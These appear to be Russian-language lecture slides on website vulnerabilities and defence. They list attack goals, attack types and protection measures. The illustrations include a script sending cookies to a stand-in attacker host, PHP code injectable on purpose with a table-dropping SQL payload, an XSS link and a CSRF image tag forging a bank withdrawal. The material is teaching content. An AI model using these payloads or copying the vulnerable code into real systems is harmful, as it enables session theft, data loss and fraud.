Уязвимость сайтов и обеспечение их безопасности

Уязвимость сайтов и
обеспечение их безопасности
Цели атак на сайты




Получение секретной информации
(пароли и т.п.)
Получение конфиденциальной
информации
Выведение сайтов из строя, удаление
данных
Замена содержимого сайтов,
размещение рекламной информации
Предметы атак на сайты
WWW-сервера:




Операционная система
HTTP-сервер
Серверные расширения
Веб-приложения
WWW-клиенты:


Операционная система (внедрение вирусов)
Получение cookie, хранящихся на компьютере
Виды сетевых атак










DoS-атаки и DDoS-атаки (Distributed Denial of Service)
Фишинг (phishing)
ip-спуфинг (spoofing)
Троянский конь (Spyware)
drive-by download (загрузка программ на сервер)
Cross-Site Scripting (CSS) (HTML injection)
SQL injection
XSS (межсайтовый скриптинг)
CSRF (Cross-site request forgery) Атака одного клика
Без использования сетевых средств
HTML injection
<script>
window.open("http://www.attacker.site/collec
t.cgi?cookie="+document.cookie)
</script>
SQL injection
$firstname = $_POST["firstname"];
mysql_query("SELECT * FROM users WHERE
first_name='$firstname'");
Если firstname = "'; drop table users; #", то
код удалит таблицу пользователей
XSS (межсайтовый скриптинг)
$firstname = $_GET["firstname"];
echo "Your name: $firstname";
Если firstname = "<script>…</script>", то
скрипт будет выполнен
Достаточно дать пользователям ссылку
http://hacked.ru/any.php?firstname=
<script>…</script>
CSRF Атака одного клика
Заставить клиента выполнить нужный запрос
<img
src="http://bank.example/withdraw?account
=Bob&amount=1000000&for=John">
Защита от интернет-атак
Защита на стороне сервера:
 Настройка прав на компьютере-сервере
 Настройка http-сервера
 Аккуратное программирование на стороне сервера
 Проверка входящих http-запросов
Защита на клиенте:
 Общая антивирусная защита
 Проверка входящего http-трафика
 Настройки безопасности браузеров
 Разумные методы хранения паролей и
конфиденциальных данных